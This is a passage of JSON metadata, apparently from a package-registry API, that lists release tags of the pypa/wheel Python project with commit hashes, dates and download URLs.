oad_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/h